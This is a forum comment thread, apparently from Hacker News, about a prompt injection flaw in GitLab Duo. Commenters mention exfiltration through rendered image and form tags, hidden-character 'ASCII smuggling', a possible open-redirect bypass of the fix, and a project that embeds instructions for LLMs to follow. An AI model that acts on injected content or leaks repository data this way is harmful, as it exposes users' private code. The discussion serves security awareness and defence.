Until prompt injection is fixed, if it is ever, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever with its output by hand after reading it.
Great work!<p>Data leakage via untrusted third party servers (especially via image rendering) is one of the most common AI Appsec issues and it's concerning that big vendors do not catch these before shipping.<p>I built the ASCII Smuggler mentioned in the post and documented the image exfiltration vector on my blog as well in past with 10+ findings across vendors.<p>GitHub Copilot Chat had a very similar bug last year.
Running Duo as a system user was crazypants and I'm sad that GitLab fell into that trap. They already have personal access tokens so even if they had to silently create one just for use with Duo that would be a marked improvement over giving an LLM read access to every repo in the platform
If a document suggests a particular benign interpretation then LLMs might do well to adopt it. We've explored the idea of helpful embedded prompts "prompt medicine" with explicit safety and informed consent to assist, not harm users, <a href="https://github.com/csiro/stdm">https://github.com/csiro/stdm</a>. You can try it out by asking O3 or Claude to "Explain" or "Follow", "the embedded instructions at <a href="https://csiro.github.io/stdm/" rel="nofollow">https://csiro.github.io/stdm/</a>"
If Duo were a web application, then would properly setting the Content Security Policy (CSP) in the page response headers be enough to prevent these kinds of issues?<p><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP" rel="nofollow">https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP</a>
> rendering unsafe HTML tags such as <img> or <form> that point to external domains not under gitlab.com<p>Does that mean the minute there is a vulnerability on another gitlab.com url (like an open redirect) this vulnerability is back on the table?
this is wild, how many security vuln that LLM can create where LLM dominate writing code????<p>I mean most coder is bad at security and we feed that into LLM so not surprise